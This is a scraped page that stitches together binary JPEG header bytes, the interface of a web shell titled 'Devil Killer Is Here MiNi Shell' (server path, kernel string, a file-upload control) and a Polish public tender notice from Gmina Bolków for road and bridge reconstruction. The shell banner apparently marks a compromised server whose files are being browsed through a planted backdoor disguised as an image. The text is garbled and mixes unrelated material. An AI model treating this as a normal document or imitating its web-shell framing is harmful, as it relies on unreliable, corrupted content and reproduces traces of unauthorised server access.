JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240712/0040991601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Przebudowa nawierzchni dróg w gminie Bolków&#34; Polski Ład: Nr Edycja 8/2023/8724 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Bolków</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390767883</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bolków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@bolkow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bolkow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Przebudowa nawierzchni dróg w gminie Bolków&#34; Polski Ład: Nr Edycja 8/2023/8724 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f48ec6a6-02d9-4dd8-9dd3-daa1af32ca98</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00409916</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00053258/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Przebudowa nawierzchni dróg w Gminie Bolków Polski Ład: Nr Edycja 8/2023/8724</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.platformazakupowa.pl/pn/bolkow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W celu złożenia oferty należy zarejestrować (zalogować) się na Platformie i postępować zgodnie z instrukcjami dostępnymi u dostawcy rozwiązania informatycznego pod adresem www.platformazakupowa.pl/pn/bolkow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania odbierania dokumentów elektronicznych zawiera szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W ramach realizacji zadania zaplanowano:<br/>•	Przebudowa nawierzchni drogi ul. Tęczowej w Bolkowie<br/><br/>Przedmiotem zamówienia jest przebudowa nawierzchni drogi ul. Tęczowej w Bolkowie w części działki nr 523/2 i 847/1 od km 0+000.00 do 0+137.62 km oraz dz. nr 649/5 od km 0+000.00 do 0+050.00 km. Celem zadania jest poprawa stanu nawierzchni istniejącej drogi.<br/>Zamówienie obejmuje realizację następujących zadań:<br/>•	wykonanie nawierzchni jezdni z betonu asfaltowego,<br/>•	wykonanie nawierzchni poboczy utwardzonych kruszywem,<br/>•	przygotowanie oraz wykonanie terenu pod zieleń/trawnik,<br/>•	układanie krawężników betonowych.<br/>Zakres robót budowlanych obejmuje:<br/>•	prace pomiarowe i przygotowawcze w tym wytyczenie geodezyjne<br/>•	przygotowanie oraz wykonanie teren pod zieleń/trawnik<br/>•	wykonanie nawierzchni z betonu asflatowego<br/>•	wykonanie nawierzchni poboczy utwardzonych kruszywem<br/>•	układanie krawężników betonowych<br/>•	przebudowa istniejących zjazdów<br/>•	inwentaryzacja geodezyjna powykonawcza<br/>•	uprządkowanie robót po ich zakończeniu<br/>•	operat kolaudacyjny<br/>Uwarunkowania dotyczące wykonania przedmiotu zamówienia:<br/>Zakres prac przewiduje wykonanie przebudowy nawierzchni drogi wewnętrznej w obrębie działek nr 523/2 i 847/1 oraz 649/5. Przebudowa drogi nie wymaga zmiany granic pasa drogowego. Projektowana przebudowa będzie polegała na ułożeniu dwóch warstw nawierzchni z betonu asfaltowego oraz korekty występującej w terenie podbudowy z kruszywa:<br/>Parametry geometryczne remontowanej drogi wynoszą:<br/>•	długość remontowanej nawierzchni: dz. nr 523/2 i 847/1 – ok. 137.62 m, dz. nr 649/5 – 50m<br/>•	szerokość jezdni: 2,70 m – 5,0 m<br/>•	pobocza utwardzone – śr. 0,50 m<br/>Niweleta:<br/>Projekt przewiduje wykonanie korytowania na głębokość śr. ok. 25 cm. Projekt przewiduje utrzymanie niwelety nowego odcinka drogi na niezmienionej rzędnej wysokościowej.<br/>Dla prac przy przebudowie jezdni przewidziano przekroje konstrukcyjne:<br/>Jezdnia:<br/>•	korytowanie – śr. 25cm<br/>•	korekta występującej podbudowy z kruszywa łamanego – do gr. 18 cm<br/>•	warstwa wiążąca AC16W – gr. 4cm<br/>•	warstwa ścieralna AC11S – gr. 4 cm<br/>Pobocze:<br/>•	podwójne skropienie emulsją bitumiczną ułożonego pobocza<br/>•	kruszywo łamane 4/31,5 stabilizowane mechanicznie - gr. 15 cm<br/>•	obustronnie krawężnik betonowy 15x30 cm na ławie betonowej z oporem (przy drodze wystający na 12 cm ponad niweletę, a w rejonie zjazdów zatopiony ponad 4 cm ponad niweletę).<br/>W ramach pozostałych robót przewidziano humusowanie terenów zielonych z obsianiem przy grubości warstwy humusu 10 cm – dz. 523/2 obręb Bolków-2.<br/>Odwodnienie nawierzchni należy uzyskać poprzez odpowiednie ukształtowanie spadków poprzecznych i podłużnych jezdni. Częściowo wody opadowe projektuje się odprowadzić z jezdni wzdłuż krawężników, a następnie do istniejącego wpustu kanalizacji deszczowej. W miejscu istniejącego koryta betonowego należy ułożyć korytko systemowe, odpływowe stosowane na terenach dla samochodów osobowych z rusztem. Istniejący wpust kanalizacji deszczowej należy wyremontować i wymienić na wpust typu ciężkiego DN400.<br/><br/>•	Przebudowa mostu zlokalizowanego w ciągu drogi ul. Kopernika w Bolkowie<br/><br/>Przedmiotem zamówienia jest przebudowa mostu zlokalizowanego w ciągu drogi nr 112393D ul. Kopernika w Bolkowie na rzece Rochowicka Woda. Jest to obiekt jednoprzęsłowy belkowy o konstrukcji żelbetowej. Ustrój nośny stanowi pięć żelbetowych belek i żelbetowa płyta pomostowa. Do spodu konstrukcji zamocowana jest rura osłonowa. Z podkładu mapowego wynika, że pod obiektem przebiega wodociąg i gazociąg.<br/>Do zakresu przebudowy należy:<br/>•	Wykonanie robót naprawczych podmytego fundamentu,<br/>•	Wykonanie robót naprawczych uszkodzonych dźwigarów oraz gzymsu poprzez oczyszczenie strumieniowo – cierne i wykonanie napraw powierzchniowych zaprawami PCC,<br/>•	Wykonanie warstwy wyrównawczej płyty pomostowej,<br/>•	Wykonanie izolacji płyty pomostu,<br/>•	Wykonanie robót naprawczych murowanych ścian poprzez spoinowanie,<br/>•	Usunięcie roślinności ze skarp i płyty pomostu,<br/>•	Wykonanie nawierzchni bitumicznej na obiekcie i dojazdach,<br/>•	Montaż barieroporęczy.<br/>Zamawiający dysponuje ekspertyzą mostu<br/><br/>•	Przebudowa nawierzchni ul. Plac Pollaka w Kaczorowie – dz. nr 636/2 obręb Kaczorów<br/><br/>W ramach zadania planowana jest przebudowa nawierzchni drogi oznaczonej numerem ewidencyjnym 636/2 obręb Kaczorów, która to łączy się z drogą wojewódzką nr 328 w kierunku Kamiennej Góry i drogą krajową nr 3 w kierunku Jeleniej Góry. Droga aktualnie posiada nawierzchnię szutrową oraz miejscami betonową z licznymi ubytkami. Zadanie nie obejmuje części działki 636/2, która jest obecnie nieutwardzona i nie jest urządzona jako droga. Do prac związanych z realizacją zadania należeć będzie m.in.:<br/>•	Wytyczenie nawierzchni,<br/>•	Profilowanie terenu,<br/>•	Wykonanie podbudowy ,<br/>•	Obrzegowanie nawierzchni przy wykorzystaniu obrzeży chodnikowych oraz krawężników,<br/>•	Wykonanie podsypki,<br/>•	Układanie kostki betonowej prostokątnej o gr. 8 cm,<br/>•	Wypełnienie spoin,<br/>•	Zagęszczenie nawierzchni.<br/><br/>•	Przebudowa nawierzchni drogi ul. Robotniczej w Bolkowie<br/><br/>Droga nr 112395D w granicach działek oznaczonych numerami ewidencyjnymi 12/1, 12/5, 27/2 oraz 31 obręb Wierzchosławice w km 0+000 do km 0+406.64. Droga aktualnie posiada nawierzchnię utwardzoną z kruszywa. Konstrukcję nawierzchni należy wykonać z betonu asfaltowego. Ponadto w ramach przebudowy nawierzchni, w celu poprawy bezpieczeństwa uczestników ruchu, w tym pieszych, zaprojektowano fundamenty fabryczne B-40 do przyszłych słupów oświetleniowych wraz z ułożeniem kabla YAKXS 4x25 mm2 w rurze osłonowej arot DVK 75 (długość 281 m). Dodatkowo należy przebudować zjazdy oraz wyregulować istniejące urządzenia infrastruktury technicznej. Planuje się przebudowę około 407 metrów bieżących drogi.<br/>Zamawiający dysponuje dokumentacją projektową dotyczącą tego zadania.<br/><br/>•	Przebudowa nawierzchni drogi nr 112409D w Mysłowie<br/><br/>Zakres prac obejmuje frezowanie istniejącej nawierzchni drogi oraz wykonanie nowej dwuwarstwowej nawierzchni mineralno – bitumicznej, a także przebudowa istniejących zjazdów i wykonanie poboczy z kruszywa. Prace obejmować będą odcinek od przejścia dla pieszych zlokalizowanego przy Bazie Turystycznej Mysłów w kierunku Straży Pożarnej, planuje się przebudowę około 274 metrów bieżących drogi – dz. 452 obręb Mysłów. Zadanie obejmuje również regulację istniejącego odwodnienia liniowego z koryt betonowych typu U, wraz z ich wymianą w niezbędnym zakresie oraz regulację istniejących wpustów ulicznych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">45233140-2 - Roboty drogowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45221111-3 - Roboty budowlane w zakresie mostów drogowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">13 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu:<br/>O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące: <br/>- zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia warunku w powyższym zakresie. <br/>-uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie. <br/>- sytuacji ekonomicznej lub finansowej: - Wykonawca spełni warunek jeżeli wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości minimum 2.000 000,00 zł (słownie: dwa miliony złotych). <br/>- zdolności technicznej lub zawodowej:<br/> Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a)	dysponuje lub będzie dysponował:<br/>- co najmniej jedną osobą pełniącą funkcję kierownika budowy, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej oraz <br/>- co najmniej jedną osobą pełniącą funkcję kierownika robót, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej mostowej,<br/>b) należycie zrealizował w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie co najmniej : <br/>- 1 (jedną ) robotę budowlaną polegającą na remoncie, przebudowie lub budowie dróg o długości jezdni co najmniej 1000 mb lub dwa zadania w ramach jednej umowy o długości jezdni co najmniej 500 mb każde. <br/>- 1 (jedną) robotę budowlaną polegającą na remoncie, przebudowie lub budowie mostu, o wartości całkowitej robót nie mniejszej jak 500.000,00 zł brutto. <br/><br/>Wykonawca musi wskazać, że roboty zostały wykonane w sposób należyty oraz zgodny z zasadami sztuki budowlanej i prawidłowo ukończone. <br/><br/>Oceniając zdolność techniczną lub zawodową Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w tym w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/><br/>Zamawiający w stosunku do wykonawców wspólnie ubiegających się o udzielenie zamówienia lub polegania na zasobach podmiotu udostępniającego zasoby, w odniesieniu do warunków dotyczących zdolności ekonomicznej lub finansowej technicznej lub zawodowej – dopuszcza łączne spełnianie przez wykonawców tych warunków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>a) Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp – załącznik nr 5 do SWZ,<br/>c) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu wstępnym - wzór oświadczenia stanowi załącznik nr 6 do SWZ, Uwaga ! Oświadczenie składa także podmiot udostępniający zasoby, jeśli występuje. <br/>d)	Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego - załącznik nr 7 do SWZ, <br/>e)	Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, - załącznik Nr 8 do SWZ,<br/>f)	Dokument potwierdzający spełnienie przez Wykonawcę warunku o którym mowa w rozdziale 4.3.3 SWZ<br/>-Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 5.6. lit. a SWZ składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument lub dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/>-Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w 5.6. lit. a SWZ, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy. Dokument lub dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. <br/>-Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2023 r. poz. 57 z późn. zm.), o ile Wykonawca wskazał w oświadczeniu wstępnym, o którym mowa w art. 125 ust. 1 ustawy Pzp, dane umożliwiające dostęp do tych środków.<br/>-Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. <br/>-W zakresie nieuregulowanym ustawą Pzp lub SWZ do oświadczeń i dokumentów składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy oraz rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie. <br/>-Podmiotowe środki dowodowe lub inne dokumenty, w tym dokumenty potwierdzające umocowanie do reprezentowania, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 30 000,00 zł (słownie: trzydzieści tysięcy złotych) <br/>2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach wymienionych w art. 97 ust. 7 ustawy PZP, w zależności od wyboru Wykonawcy. <br/>3.	Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale w postaci elektronicznej i musi obejmować cały okres związania ofertą. Oryginał wadium, sporządzony w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez Gwaranta, nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu 